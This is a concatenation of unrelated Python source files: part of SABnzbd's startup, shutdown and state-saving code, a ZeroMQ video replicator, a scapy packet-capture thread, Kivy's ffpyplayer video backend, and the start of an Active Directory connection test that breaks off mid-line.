check_incomplete_vs_complete() # Set language files lang.set_locale_info("SABnzbd", DIR_LANGUAGE) lang.set_language(cfg.language()) sabnzbd.api.clear_trans_cache() # Set end-of-queue action sabnzbd.change_queue_complete_action(cfg.queue_complete(), new=False) # Convert auto-sort if cfg.auto_sort() == "0": cfg.auto_sort.set("") elif cfg.auto_sort() == "1": cfg.auto_sort.set("avg_age asc") # Add hostname to the whitelist if not cfg.host_whitelist(): cfg.host_whitelist.set(socket.gethostname()) # Do repair if requested if check_repair_request(): repair = 2 pause_downloader = True # Initialize threads sabnzbd.ArticleCache = sabnzbd.articlecache.ArticleCache() sabnzbd.BPSMeter = sabnzbd.bpsmeter.BPSMeter() sabnzbd.NzbQueue = sabnzbd.nzbqueue.NzbQueue() sabnzbd.Downloader = sabnzbd.downloader.Downloader(sabnzbd.BPSMeter.read() or pause_downloader) sabnzbd.Decoder = sabnzbd.decoder.Decoder() sabnzbd.Assembler = sabnzbd.assembler.Assembler() sabnzbd.PostProcessor = sabnzbd.postproc.PostProcessor() sabnzbd.DirScanner = sabnzbd.dirscanner.DirScanner() sabnzbd.Rating = sabnzbd.rating.Rating() sabnzbd.URLGrabber = sabnzbd.urlgrabber.URLGrabber() sabnzbd.RSSReader = sabnzbd.rss.RSSReader() sabnzbd.Scheduler = sabnzbd.scheduler.Scheduler() # Run startup tasks sabnzbd.NzbQueue.read_queue(repair) sabnzbd.Scheduler.analyse(pause_downloader) # Set cache limit for new users if not cfg.cache_limit(): cfg.cache_limit.set(misc.get_cache_limit()) sabnzbd.ArticleCache.new_limit(cfg.cache_limit.get_int()) logging.info("All processes started") sabnzbd.RESTART_REQ = False sabnzbd.__INITIALIZED__ = True @synchronized(INIT_LOCK) def start(): if sabnzbd.__INITIALIZED__: logging.debug("Starting postprocessor") sabnzbd.PostProcessor.start() logging.debug("Starting assembler") sabnzbd.Assembler.start() logging.debug("Starting downloader") sabnzbd.Downloader.start() logging.debug("Starting decoders") sabnzbd.Decoder.start() logging.debug("Starting scheduler") sabnzbd.Scheduler.start() logging.debug("Starting dirscanner") sabnzbd.DirScanner.start() logging.debug("Starting rating") sabnzbd.Rating.start() logging.debug("Starting urlgrabber") sabnzbd.URLGrabber.start() @synchronized(INIT_LOCK) def halt(): if sabnzbd.__INITIALIZED__: logging.info("SABnzbd shutting down...") sabnzbd.__SHUTTING_DOWN__ = True # Stop the windows tray icon if sabnzbd.WINTRAY: sabnzbd.WINTRAY.stop() # Remove registry information if sabnzbd.WIN32: del_connection_info() sabnzbd.zconfig.remove_server() sabnzbd.utils.ssdp.stop_ssdp() sabnzbd.directunpacker.abort_all() logging.debug("Stopping RSSReader") sabnzbd.RSSReader.stop() logging.debug("Stopping URLGrabber") sabnzbd.URLGrabber.stop() try: sabnzbd.URLGrabber.join() except: pass logging.debug("Stopping rating") sabnzbd.Rating.stop() try: sabnzbd.Rating.join() except: pass logging.debug("Stopping dirscanner") sabnzbd.DirScanner.stop() try: sabnzbd.DirScanner.join() except: pass logging.debug("Stopping downloader") sabnzbd.Downloader.stop() try: sabnzbd.Downloader.join() except: pass # Decoder handles join gracefully logging.debug("Stopping decoders") sabnzbd.Decoder.stop() sabnzbd.Decoder.join() logging.debug("Stopping assembler") sabnzbd.Assembler.stop() try: sabnzbd.Assembler.join() except: pass logging.debug("Stopping postprocessor") sabnzbd.PostProcessor.stop() try: sabnzbd.PostProcessor.join() except: pass # Save State try: save_state() except: logging.error(T("Fatal error at saving state"), exc_info=True) # The Scheduler cannot be stopped when the stop was scheduled. # Since all warm-restarts have been removed, it's not longer # needed to stop the scheduler. # We must tell the scheduler to deactivate. logging.debug("Terminating scheduler") sabnzbd.Scheduler.abort() logging.info("All processes stopped") sabnzbd.__INITIALIZED__ = False def notify_shutdown_loop(): """Trigger the main loop to wake up""" with sabnzbd.SABSTOP_CONDITION: sabnzbd.SABSTOP_CONDITION.notify() def shutdown_program(): """Stop program after halting and saving""" if not sabnzbd.SABSTOP: logging.info("[%s] Performing SABnzbd shutdown", misc.caller_name()) sabnzbd.halt() cherrypy.engine.exit() sabnzbd.SABSTOP = True notify_shutdown_loop() def trigger_restart(timeout=None): """Trigger a restart by setting a flag an shutting down CP""" # Sometimes we need to wait a bit to send good-bye to the browser if timeout: time.sleep(timeout) # Set the flag and wake up the main loop sabnzbd.TRIGGER_RESTART = True notify_shutdown_loop() ############################################################################## # Misc Wrappers ############################################################################## def new_limit(): """Callback for article cache changes""" sabnzbd.ArticleCache.new_limit(cfg.cache_limit.get_int()) def guard_restart(): """Callback for config options requiring a restart""" sabnzbd.RESTART_REQ = True def guard_top_only(): """Callback for change of top_only option""" sabnzbd.NzbQueue.set_top_only(cfg.top_only()) def guard_pause_on_pp(): """Callback for change of pause-download-on-pp""" if cfg.pause_on_post_processing(): pass # Not safe to idle downloader, because we don't know # if post-processing is active now else: sabnzbd.Downloader.resume_from_postproc() def guard_quota_size(): """Callback for change of quota_size""" sabnzbd.BPSMeter.change_quota() def guard_quota_dp(): """Callback for change of quota_day or quota_period""" sabnzbd.Scheduler.restart() def guard_language(): """Callback for change of the interface language""" sabnzbd.lang.set_language(cfg.language()) sabnzbd.api.clear_trans_cache() def set_https_verification(value): """Set HTTPS-verification state while returning current setting False = disable verification """ prev = ssl._create_default_https_context == ssl.create_default_context if value: ssl._create_default_https_context = ssl.create_default_context else: ssl._create_default_https_context = ssl._create_unverified_context return prev def guard_https_ver(): """Callback for change of https verification""" set_https_verification(cfg.enable_https_verification()) def add_url(url, pp=None, script=None, cat=None, priority=None, nzbname=None, password=None): """Add NZB based on a URL, attributes optional""" if "http" not in url: return if not pp or pp == "-1": pp = None if script and script.lower() == "default": script = None if cat and cat.lower() == "default": cat = None logging.info("Fetching %s", url) # Add feed name if it came from RSS msg = T("Trying to fetch NZB from %s") % url if nzbname: msg = "%s - %s" % (nzbname, msg) # Generate the placeholder future_nzo = sabnzbd.NzbQueue.generate_future(msg, pp, script, cat, url=url, priority=priority, nzbname=nzbname) # Set password if not future_nzo.password: future_nzo.password = password # Get it! sabnzbd.URLGrabber.add(url, future_nzo) return future_nzo.nzo_id def save_state(): """Save all internal bookkeeping to disk""" config.save_config() sabnzbd.ArticleCache.flush_articles() sabnzbd.NzbQueue.save() sabnzbd.BPSMeter.save() sabnzbd.Rating.save() sabnzbd.DirScanner.save() sabnzbd.PostProcessor.save() sabnzbd.RSSReader.save() def pause_all(): """Pause all activities than cause disk access""" sabnzbd.PAUSED_ALL = True sabnzbd.Downloader.pause() logging.debug("PAUSED_ALL active") def unpause_all(): """Resume all activities""" sabnzbd.PAUSED_ALL = False sabnzbd.Downloader.resume() logging.debug("PAUSED_ALL inactive") ############################################################################## # NZB Saving Methods ############################################################################## def backup_exists(filename: str) -> bool: """Return True if backup exists and no_dupes is set""" path = cfg.nzb_backup_dir.get_path() return path and os.path.exists(os.path.join(path, filename + ".gz")) def backup_nzb(filename: str, data: AnyStr): """Backup NZB file""" path = cfg.nzb_backup_dir.get_path() if path: save_compressed(path, filename, data) def save_compressed(folder: str, filename: str, data: AnyStr): """Save compressed NZB file in folder""" if filename.endswith(".nzb"): filename += ".gz" else: filename += ".nzb.gz" logging.info("Backing up %s", os.path.join(folder, filename)) try: # Have to get around the path being put inside the tgz with open(os.path.join(folder, filename), "wb") as tgz_file: f = gzip.GzipFile(filename, fileobj=tgz_file, mode="wb") f.write(encoding.utob(data)) f.flush() f.close() except: logging.error(T("Saving %s failed"), os.path.join(folder, filename)) logging.info("Traceback: ", exc_info=True) ############################################################################## # Unsynchronized methods ############################################################################## def add_nzbfile( nzbfile: Union[str, cherrypy._cpreqbody.Part], pp: Optional[Union[int, str]] = None, script: Optional[str] = None, cat: Optional[str] = None, catdir: Optional[str] = None, priority: Optional[Union[int, str]] = DEFAULT_PRIORITY, nzbname: Optional[str] = None, nzo_info=None, url: Optional[str] = None, keep: Optional[bool] = None, reuse: Optional[str] = None, password: Optional[str] = None, nzo_id: Optional[str] = None, ): """Add file, either a single NZB-file or an archive. All other parameters are passed to the NZO-creation. """ if pp == "-1": pp = None if script and (script.lower() == "default" or not filesystem.is_valid_script(script)): script = None if cat and cat.lower() == "default": cat = None if isinstance(nzbfile, str): # File coming from queue repair or local file-path path = nzbfile filename = os.path.basename(path) keep_default = True if not sabnzbd.WIN32: # If windows client sends file to Unix server backslashes may # be included, so convert these path = path.replace("\\", "/") logging.info("Attempting to add %s [%s]", filename, path) else: # File from file-upload object # CherryPy mangles unicode-filenames: https://github.com/cherrypy/cherrypy/issues/1766 filename = encoding.correct_unknown_encoding(nzbfile.filename) logging.info("Attempting to add %s", filename) keep_default = False try: # We have to create a copy, because we can't re-use the CherryPy temp-file # Just to be sure we add the extension to detect file type later on nzb_temp_file, path = tempfile.mkstemp(suffix=filesystem.get_ext(filename)) os.write(nzb_temp_file, nzbfile.file.read()) os.close(nzb_temp_file) except OSError: logging.error(T("Cannot create temp file for %s"), filename) logging.info("Traceback: ", exc_info=True) return None # Externally defined if we should keep the file? if keep is None: keep = keep_default if filesystem.get_ext(filename) in VALID_ARCHIVES: return nzbparser.process_nzb_archive_file( filename, path=path, pp=pp, script=script, cat=cat, catdir=catdir, priority=priority, nzbname=nzbname, keep=keep, reuse=reuse, nzo_info=nzo_info, url=url, password=password, nzo_id=nzo_id, ) else: return nzbparser.process_single_nzb( filename, path=path, pp=pp, script=script, cat=cat, catdir=catdir, priority=priority, nzbname=nzbname, keep=keep, reuse=reuse, nzo_info=nzo_info, url=url, password=password, nzo_id=nzo_id, ) def enable_server(server): """Enable server (scheduler only)""" try: config.get_config("servers", server).enable.set(1) except: logging.warning(T("Trying to set status of non-existing server %s"), server) return config.save_config() sabnzbd.Downloader.update_server(server, server) def disable_server(server): """Disable server (scheduler only)""" try: config.get_config("servers", server).enable.set(0) except: logging.warning(T("Trying to set status of non-existing server %s"), server) return config.save_config() sabnzbd.Downloader.update_server(server, server) def system_shutdown(): """Shutdown system after halting download and saving bookkeeping""" logging.info("Performing system shutdown") Thread(target=halt).start() while __INITIALIZED__: time.sleep(1.0) if sabnzbd.WIN32: powersup.win_shutdown() elif DARWIN: powersup.osx_shutdown() else: powersup.linux_shutdown() def system_hibernate(): """Hibernate system""" logging.info("Performing system hybernation") if sabnzbd.WIN32: powersup.win_hibernate() elif DARWIN: powersup.osx_hibernate() else: powersup.linux_hibernate() def system_standby(): """Standby system""" logging.info("Performing system standby") if sabnzbd.WIN32: powersup.win_standby() elif DARWIN: powersup.osx_standby() else: powersup.linux_standby() def restart_program(): """Restart program (used by scheduler)""" logging.info("Scheduled restart request") # Just set the stop flag, because stopping CherryPy from # the scheduler is not reliable sabnzbd.TRIGGER_RESTART = True def change_queue_complete_action(action, new=True): """Action or script to be performed once the queue has been completed Scripts are prefixed with 'script_' When "new" is False, check whether non-script actions are acceptable """ _action = None _argument = None if action.startswith("script_") and filesystem.is_valid_script(action.replace("script_", "", 1)): # all scripts are labeled script_xxx _action = run_script _argument = action.replace("script_", "", 1) elif new or cfg.queue_complete_pers(): if action == "shutdown_pc": _action = system_shutdown elif action == "hibernate_pc": _action = system_hibernate elif action == "standby_pc": _action = system_standby elif action == "shutdown_program": _action = shutdown_program else: action = None else: action = None if new: cfg.queue_complete.set(action or "") config.save_config() sabnzbd.QUEUECOMPLETE = action sabnzbd.QUEUECOMPLETEACTION = _action sabnzbd.QUEUECOMPLETEARG = _argument def run_script(script): """Run a user script (queue complete only)""" script_path = filesystem.make_script_path(script) if script_path: try: script_output = misc.run_command([script_path]) logging.info("Output of queue-complete script %s: \n%s", script, script_output) except: logging.info("Failed queue-complete script %s, Traceback: ", script, exc_info=True) def keep_awake(): """If we still have work to do, keep Windows/macOS system awake""" if KERNEL32 or FOUNDATION: if sabnzbd.cfg.keep_awake(): ES_CONTINUOUS = 0x80000000 ES_SYSTEM_REQUIRED = 0x00000001 if (not sabnzbd.Downloader.is_paused() and not sabnzbd.NzbQueue.is_empty()) or ( not sabnzbd.PostProcessor.paused and not sabnzbd.PostProcessor.empty() ): if KERNEL32: # Set ES_SYSTEM_REQUIRED until the next call KERNEL32.SetThreadExecutionState(ES_CONTINUOUS | ES_SYSTEM_REQUIRED) else: sleepless.keep_awake("SABnzbd is busy downloading and/or post-processing") else: if KERNEL32: # Allow the regular state again KERNEL32.SetThreadExecutionState(ES_CONTINUOUS) else: sleepless.allow_sleep() ################################################################################ # Data IO # ################################################################################ def get_new_id(prefix, folder, check_list=None): """Return unique prefixed admin identifier within folder optionally making sure that id is not in the check_list. """ for n in range(100): try: if not os.path.exists(folder): os.makedirs(folder) fd, path = tempfile.mkstemp("", "SABnzbd_%s_" % prefix, folder) os.close(fd) head, tail = os.path.split(path) if not check_list or tail not in check_list: return tail except: logging.error(T("Failure in tempfile.mkstemp")) logging.info("Traceback: ", exc_info=True) break # Cannot create unique id, crash the process raise IOError def save_data(data, _id, path, do_pickle=True, silent=False): """Save data to a diskfile""" if not silent: logging.debug("[%s] Saving data for %s in %s", misc.caller_name(), _id, path) path = os.path.join(path, _id) # We try 3 times, to avoid any dict or access problems for t in range(3): try: with open(path, "wb") as data_file: if do_pickle: pickle.dump(data, data_file, protocol=pickle.HIGHEST_PROTOCOL) else: data_file.write(data) break except: if silent: # This can happen, probably a removed folder pass elif t == 2: logging.error(T("Saving %s failed"), path) logging.info("Traceback: ", exc_info=True) else: # Wait a tiny bit before trying again time.sleep(0.1) def load_data(data_id, path, remove=True, do_pickle=True, silent=False): """Read data from disk file""" path = os.path.join(path, data_id) if not os.path.exists(path): logging.info("[%s] %s missing", misc.caller_name(), path) return None if not silent: logging.debug("[%s] Loading data for %s from %s", misc.caller_name(), data_id, path) try: with open(path, "rb") as data_file: if do_pickle: try: data = pickle.load(data_file, encoding=sabnzbd.encoding.CODEPAGE) except UnicodeDecodeError: # Could be Python 2 data that we can load using old encoding data = pickle.load(data_file, encoding="latin1") else: data = data_file.read() if remove: filesystem.remove_file(path) except: logging.error(T("Loading %s failed"), path) logging.info("Traceback: ", exc_info=True) return None return data def remove_data(_id: str, path: str): """Remove admin file""" path = os.path.join(path, _id) try: if os.path.exists(path): filesystem.remove_file(path) except: logging.debug("Failed to remove %s", path) def save_admin(data: Any, data_id: str): """Save data in admin folder in specified format""" logging.debug("[%s] Saving data for %s", misc.caller_name(), data_id) save_data(data, data_id, cfg.admin_dir.get_path()) def load_admin(data_id: str, remove=False, silent=False) -> Any: """Read data in admin folder in specified format""" logging.debug("[%s] Loading data for %s", misc.caller_name(), data_id) return load_data(data_id, cfg.admin_dir.get_path(), remove=remove, silent=silent) def request_repair(): """Request a full repair on next restart""" path = os.path.join(cfg.admin_dir.get_path(), REPAIR_REQUEST) try: with open(path, "w") as f: f.write("\n") except: pass def check_repair_request(): """Return True if repair request found, remove afterwards""" path = os.path.join(cfg.admin_dir.get_path(), REPAIR_REQUEST) if os.path.exists(path): try: filesystem.remove_file(path) except: pass return True return False def check_all_tasks(): """Check every task and restart safe ones, else restart program Return True when everything is under control """ if __SHUTTING_DOWN__ or not __INITIALIZED__: return True # Non-restartable threads, require program restart if not sabnzbd.PostProcessor.is_alive(): logging.warning(T("Restarting because of crashed postprocessor")) return False if not sabnzbd.Downloader.is_alive(): logging.warning(T("Restarting because of crashed downloader")) return False if not sabnzbd.Decoder.is_alive(): logging.warning(T("Restarting because of crashed decoder")) return False if not sabnzbd.Assembler.is_alive(): logging.warning(T("Restarting because of crashed assembler")) return False # Kick the downloader, in case it missed the semaphore sabnzbd.Downloader.wakeup() # Make sure the right servers are active sabnzbd.Downloader.check_timers() # Restartable threads if not sabnzbd.DirScanner.is_alive(): logging.info("Restarting crashed dirscanner") sabnzbd.DirScanner.__init__() if not sabnzbd.URLGrabber.is_alive(): logging.info("Restarting crashed urlgrabber") sabnzbd.URLGrabber.__init__() if not sabnzbd.Rating.is_alive(): logging.info("Restarting crashed rating") sabnzbd.Rating.__init__() if not sabnzbd.Scheduler.is_alive(): logging.info("Restarting crashed scheduler") sabnzbd.Scheduler.restart() sabnzbd.Downloader.unblock_all() # Check one-shot pause sabnzbd.Scheduler.pause_check() # Check (and terminate) idle jobs sabnzbd.NzbQueue.stop_idle_jobs() return True def pid_file(pid_path=None, pid_file=None, port=0): """Create or remove pid file""" if not sabnzbd.WIN32: if pid_path and pid_path.startswith("/"): sabnzbd.DIR_PID = os.path.join(pid_path, "sabnzbd-%d.pid" % port) elif pid_file and pid_file.startswith("/"): sabnzbd.DIR_PID = pid_file if sabnzbd.DIR_PID: try: if port: with open(sabnzbd.DIR_PID, "w") as f: f.write("%d\n" % os.getpid()) else: filesystem.remove_file(sabnzbd.DIR_PID) except: logging.warning(T("Cannot access PID file %s"), sabnzbd.DIR_PID) def check_incomplete_vs_complete(): """Make sure download_dir and complete_dir are not identical or that download_dir is not a subfolder of complete_dir""" complete = cfg.complete_dir.get_path() if filesystem.same_file(cfg.download_dir.get_path(), complete): if filesystem.real_path("X", cfg.download_dir()) == filesystem.long_path(cfg.download_dir()): # Abs path, so set download_dir as an abs path inside the complete_dir cfg.download_dir.set(os.path.join(complete, "incomplete")) else: cfg.download_dir.set("incomplete") return False return True def wait_for_download_folder(): """Wait for download folder to become available""" while not cfg.download_dir.test_path(): logging.debug('Waiting for "incomplete" folder') time.sleep(2.0) def test_ipv6(): """Check if external IPv6 addresses are reachable""" if not cfg.selftest_host(): # User disabled the test, assume active IPv6 return True try: info = sabnzbd.getipaddress.addresslookup6(cfg.selftest_host()) except: logging.debug( "Test IPv6: Disabling IPv6, because it looks like it's not available. Reason: %s", sys.exc_info()[0] ) return False try: af, socktype, proto, canonname, sa = info[0] with socket.socket(af, socktype, proto) as sock: sock.settimeout(2) # 2 second timeout sock.connect(sa[0:2]) logging.debug("Test IPv6: IPv6 test successful. Enabling IPv6") return True except socket.error: logging.debug("Test IPv6: Cannot reach IPv6 test host. Disabling IPv6") return False except: logging.debug("Test IPv6: Problem during IPv6 connect. Disabling IPv6. Reason: %s", sys.exc_info()[0]) return False def test_cert_checking(): """Test quality of certificate validation""" # User disabled the test, assume proper SSL certificates if not cfg.selftest_host(): return True # Try a connection to our test-host try: ctx = ssl.create_default_context() base_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ssl_sock = ctx.wrap_socket(base_sock, server_hostname=cfg.selftest_host()) ssl_sock.settimeout(2.0) ssl_sock.connect((cfg.selftest_host(), 443)) ssl_sock.close() return True except (socket.gaierror, socket.timeout): # Non-SSL related error. # We now assume that certificates work instead of forcing # lower quality just because some (temporary) internet problem logging.info("Could not determine system certificate validation quality due to connection problems") return True except: # Seems something is still wrong sabnzbd.set_https_verification(False) return False def history_updated(): """To make sure we always have a fresh history""" sabnzbd.LAST_HISTORY_UPDATE += 1 # Never go over the limit if sabnzbd.LAST_HISTORY_UPDATE + 1 >= sys.maxsize: sabnzbd.LAST_HISTORY_UPDATE = 1
replicatorsrc.py
import sys sys.path.append("../") from threading import Thread from common.zmqHelper import zhelper from common.util import readVideo import zmq import progressbar from appconfig import KEEPERS_TO_KEEPERS_REPL_PORT as KEEPERS_TO_KEEPERS_PORT, TRACKER_IP, TRACKER_PORTS class ReplicatorSrc: def __init__(self, port): # self.trackerSocket = zhelper.newSocket() self.mysocket = zhelper.newServerSocket(zmq.REP, "*", port) def handleTrackerRequest(self): request = self.mysocket.recv_json() print("received a request:", request) self.file, destinations = request.get("file"), request.get("dests") threads = [] for dest in destinations: t = Thread(target=self.replicate, args=(dest,)) threads.append(t) t.start() for t in threads: t.join() print("sending to the tracker to continue replication") self.mysocket.send_string("ACK") # ACK to the replicator process in the tracker to continue processing def replicate(self, dest): f = self.file print(f, dest) port = KEEPERS_TO_KEEPERS_PORT keeperSocket = zhelper.newSocket(zmq.REQ, dest["nodeIP"], (port,)) uploader = Uploader() uploader.upload(keeperSocket, f["userID"], f["fileName"]) # OPTIMIZE TODO: remove this class and add the a general uploader in the common dir that can do client and replicator uploader # OPTIMIZE TODO: read the file only one before opening the threads class Uploader: def __init__(self): pass def upload(self, socket, username, filename): data = readVideo(f"{username}/{filename}") payload = { "function": "upload", "username": username, "filename": filename, "numChunks": len(data), } socket.send_json(payload) socket.recv() print("uploading start") with progressbar.ProgressBar(max_value=len(data)) as bar: for i in range(len(data)): socket.send(data[i]) socket.recv() bar.update(i) def main(port): replicator = ReplicatorSrc(port) while(True): replicator.handleTrackerRequest() #? TODO: should we sleep here if __name__ == "__main__": import sys from appconfig import TRACKER_TO_KEEPERS_PORTS port = TRACKER_TO_KEEPERS_PORTS[0] if len(sys.argv) >= 2: port = sys.argv[1] main(port)
packet_capture.py
""" Thread that continuously captures and processes packets. """ import scapy.all as sc import threading import time from host_state import HostState import utils class PacketCapture(object): def __init__(self, host_state): assert isinstance(host_state, HostState) self._host_state = host_state self._lock = threading.Lock() self._active = True self._thread = threading.Thread(target=self._capture_packets) self._thread.daemon = True def start(self): with self._lock: self._active = True utils.log('[Packet Capture] Starting.') self._thread.start() def _capture_packets(self): while self._is_active(): if not self._host_state.is_inspecting(): time.sleep(2) continue result = utils.safe_run(sc.sniff, kwargs={ 'prn': self._host_state.packet_processor.process_packet, 'stop_filter': lambda _: not self._is_active() or not self._host_state.is_inspecting(), 'timeout': 30, 'iface': "lan0" }) if isinstance(result, utils._SafeRunError): time.sleep(1) def _is_active(self): with self._lock: return self._active def stop(self): utils.log('[Packet Capture] Stopping.') with self._lock: self._active = False self._thread.join() utils.log('[Packet Capture] Stopped.')
video_ffpyplayer.py
''' FFmpeg based video abstraction ============================== To use, you need to install ffpyplyaer and have a compiled ffmpeg shared library. https://github.com/matham/ffpyplayer The docs there describe how to set this up. But briefly, first you need to compile ffmpeg using the shared flags while disabling the static flags (you'll probably have to set the fPIC flag, e.g. CFLAGS=-fPIC). Here's some instructions: https://trac.ffmpeg.org/wiki/CompilationGuide. For Windows, you can download compiled GPL binaries from http://ffmpeg.zeranoe.com/builds/. Similarly, you should download SDL. Now, you should a ffmpeg and sdl directory. In each, you should have a include, bin, and lib directory, where e.g. for Windows, lib contains the .dll.a files, while bin contains the actual dlls. The include directory holds the headers. The bin directory is only needed if the shared libraries are not already on the path. In the environment define FFMPEG_ROOT and SDL_ROOT, each pointing to the ffmpeg, and SDL directories, respectively. (If you're using SDL2, the include directory will contain a directory called SDL2, which then holds the headers). Once defined, download the ffpyplayer git and run python setup.py build_ext --inplace Finally, before running you need to ensure that ffpyplayer is in python's path. ..Note:: When kivy exits by closing the window while the video is playing, it appears that the __del__method of VideoFFPy is not called. Because of this the VideoFFPy object is not properly deleted when kivy exits. The consequence is that because MediaPlayer creates internal threads which do not have their daemon flag set, when the main threads exists it'll hang and wait for the other MediaPlayer threads to exit. But since __del__ is not called to delete the MediaPlayer object, those threads will remain alive hanging kivy. What this means is that you have to be sure to delete the MediaPlayer object before kivy exits by setting it to None. ''' __all__ = ('VideoFFPy', ) try: import ffpyplayer from ffpyplayer.player import MediaPlayer from ffpyplayer.tools import set_log_callback, get_log_callback except: raise from threading import Thread from kivy.clock import Clock, mainthread from kivy.logger import Logger from kivy.core.video import VideoBase from kivy.graphics import Rectangle, BindTexture from kivy.graphics.texture import Texture from kivy.graphics.fbo import Fbo from kivy.weakmethod import WeakMethod import time Logger.info('VideoFFPy: Using ffpyplayer {}'.format(ffpyplayer.version)) logger_func = {'quiet': Logger.critical, 'panic': Logger.critical, 'fatal': Logger.critical, 'error': Logger.error, 'warning': Logger.warning, 'info': Logger.info, 'verbose': Logger.debug, 'debug': Logger.debug} def _log_callback(message, level): message = message.strip() if message: logger_func[level]('ffpyplayer: {}'.format(message)) if not get_log_callback(): set_log_callback(_log_callback) class VideoFFPy(VideoBase): YUV_RGB_FS = """ $HEADER$ uniform sampler2D tex_y; uniform sampler2D tex_u; uniform sampler2D tex_v; void main(void) { float y = texture2D(tex_y, tex_coord0).r; float u = texture2D(tex_u, tex_coord0).r - 0.5; float v = texture2D(tex_v, tex_coord0).r - 0.5; float r = y + 1.402 * v; float g = y - 0.344 * u - 0.714 * v; float b = y + 1.772 * u; gl_FragColor = vec4(r, g, b, 1.0); } """ def __init__(self, **kwargs): self._ffplayer = None self._thread = None self._next_frame = None self._ffplayer_need_quit = False self._callback_ref = WeakMethod(self._player_callback) self._trigger = Clock.create_trigger(self._redraw) super(VideoFFPy, self).__init__(**kwargs) def __del__(self): self.unload() def _player_callback(self, selector, value): if self._ffplayer is None: return if selector == 'quit': def close(*args): self.unload() Clock.schedule_once(close, 0) def _get_position(self): if self._ffplayer is not None: return self._ffplayer.get_pts() return 0 def _set_position(self, pos): self.seek(pos) def _set_volume(self, volume): self._volume = volume if self._ffplayer: self._ffplayer.set_volume(self._volume) def _get_duration(self): if self._ffplayer is None: return 0 return self._ffplayer.get_metadata()['duration'] @mainthread def _do_eos(self): if self.eos == 'pause': self.pause() elif self.eos == 'stop': self.stop() elif self.eos == 'loop': self.position = 0 self.dispatch('on_eos') @mainthread def _change_state(self, state): self._state = state def _redraw(self, *args): if not self._ffplayer: return next_frame = self._next_frame if not next_frame: return img, pts = next_frame if img.get_size() != self._size or self._texture is None: self._size = w, h = img.get_size() if self._out_fmt == 'yuv420p': w2 = int(w / 2) h2 = int(h / 2) self._tex_y = Texture.create( size=(w, h), colorfmt='luminance') self._tex_u = Texture.create( size=(w2, h2), colorfmt='luminance') self._tex_v = Texture.create( size=(w2, h2), colorfmt='luminance') self._fbo = fbo = Fbo(size=self._size) with fbo: BindTexture(texture=self._tex_u, index=1) BindTexture(texture=self._tex_v, index=2) Rectangle(size=fbo.size, texture=self._tex_y) fbo.shader.fs = VideoFFPy.YUV_RGB_FS fbo['tex_y'] = 0 fbo['tex_u'] = 1 fbo['tex_v'] = 2 self._texture = fbo.texture else: self._texture = Texture.create(size=self._size, colorfmt='rgba') # XXX FIXME #self.texture.add_reload_observer(self.reload_buffer) self._texture.flip_vertical() self.dispatch('on_load') if self._texture: if self._out_fmt == 'yuv420p': dy, du, dv, _ = img.to_memoryview() self._tex_y.blit_buffer(dy, colorfmt='luminance') self._tex_u.blit_buffer(du, colorfmt='luminance') self._tex_v.blit_buffer(dv, colorfmt='luminance') else: self._texture.blit_buffer( img.to_memoryview()[0], colorfmt='rgba') self._fbo.ask_update() self._fbo.draw() self.dispatch('on_frame') def _next_frame_run(self): ffplayer = self._ffplayer sleep = time.sleep trigger = self._trigger did_dispatch_eof = False # fast path, if the source video is yuv420p, we'll use a glsl shader for # buffer conversion to rgba while not self._ffplayer_need_quit: src_pix_fmt = ffplayer.get_metadata().get('src_pix_fmt') if not src_pix_fmt: sleep(0.005) continue if src_pix_fmt == 'yuv420p': self._out_fmt = 'yuv420p' ffplayer.set_output_pix_fmt(self._out_fmt) self._ffplayer.toggle_pause() break if self._ffplayer_need_quit: return # wait until loaded or failed, shouldn't take long, but just to make # sure metadata is available. s = time.clock() while not self._ffplayer_need_quit: if ffplayer.get_metadata()['src_vid_size'] != (0, 0): break # XXX if will fail later then? if time.clock() - s > 10.: break sleep(0.005) if self._ffplayer_need_quit: return # we got all the informations, now, get the frames :) self._change_state('playing') while not self._ffplayer_need_quit: t1 = time.time() frame, val = ffplayer.get_frame() t2 = time.time() if val == 'eof': sleep(0.2) if not did_dispatch_eof: self._do_eos() did_dispatch_eof = True elif val == 'paused': did_dispatch_eof = False sleep(0.2) else: did_dispatch_eof = False if frame: self._next_frame = frame trigger() else: val = val if val else (1 / 30.) sleep(val) def seek(self, percent): if self._ffplayer is None: return self._ffplayer.seek(percent * self._ffplayer.get_metadata() ['duration'], relative=False) self._next_frame = None def stop(self): self.unload() def pause(self): if self._ffplayer and self._state != 'paused': self._ffplayer.toggle_pause() self._state = 'paused' def play(self): if self._ffplayer and self._state == 'paused': self._ffplayer.toggle_pause() self._state = 'playing' return self.load() self._out_fmt = 'rgba' ff_opts = { 'paused': True, 'out_fmt': self._out_fmt } self._ffplayer = MediaPlayer( self._filename, callback=self._callback_ref, thread_lib='SDL', loglevel='info', ff_opts=ff_opts) self._ffplayer.set_volume(self._volume) self._thread = Thread(target=self._next_frame_run, name='Next frame') self._thread.daemon = True self._thread.start() def load(self): self.unload() def unload(self): Clock.unschedule(self._redraw) self._ffplayer_need_quit = True if self._thread: self._thread.join() self._thread = None if self._ffplayer: self._ffplayer = None self._next_frame = None self._size = (0, 0) self._state = '' self._ffplayer_need_quit = False
connection_test.py
import demistomock as demisto from Active_Directory_Query import main, group_dn import socket import ssl from threading import Thread import time import os import pytest import json from IAMApiModule import * from unittest.mock import patch BASE_TEST_PARAMS = { 'server_ip': '127.0.0.1', 'secure_connection': 'None', 'page_size': '500', 'credentials': {'identifier': 'bad', 'password': 'bad'} } RETURN_ERROR_TARGET = 'Active_Directory_Query.return_error' def test_bad_host_no_ssl(mocker): mocker.patch.object(demisto, 'params', return_value=BASE_TEST_PARAMS) return_error_mock = mocker.patch(RETURN_ERROR_TARGET) # validate our mock of params assert demisto.params().get('server_ip') == '127.0.0.1' main() assert return_error_mock.call_count == 1 # call_args last call with a tuple of args list and kwargs err_msg = return_error_mock.call_args[0][0] assert len(err_msg) < 100 assert 'Failed to access' in err_msg @pytest.mark.filterwarnings("ignore::ResourceWarning") def test_bad_ssl(mocker): params = BASE_TEST_PARAMS.copy() params['server_ip'] = '185.199.108.153' # disable-secrets-detection params['secure_connection'] = 'SSL' params['port'] = 443 mocker.patch.object(demisto, 'params', return_value=params) return_error_mock = mocker.patch(RETURN_ERROR_TARGET) demisto_info_mock = mocker.patch.object(demisto, "info") # validate our mock of params assert demisto.params().get('secure_connection') == 'SSL' main() assert return_error_mock.call_count == 1 # call_args last call with a tuple of args list and kwargs err_msg = return_error_mock.call_args[0][0] assert len(err_msg) < 100 assert 'Failed to access' in err_msg assert 'SSL error' in err_msg # call_args_list holds all calls (we 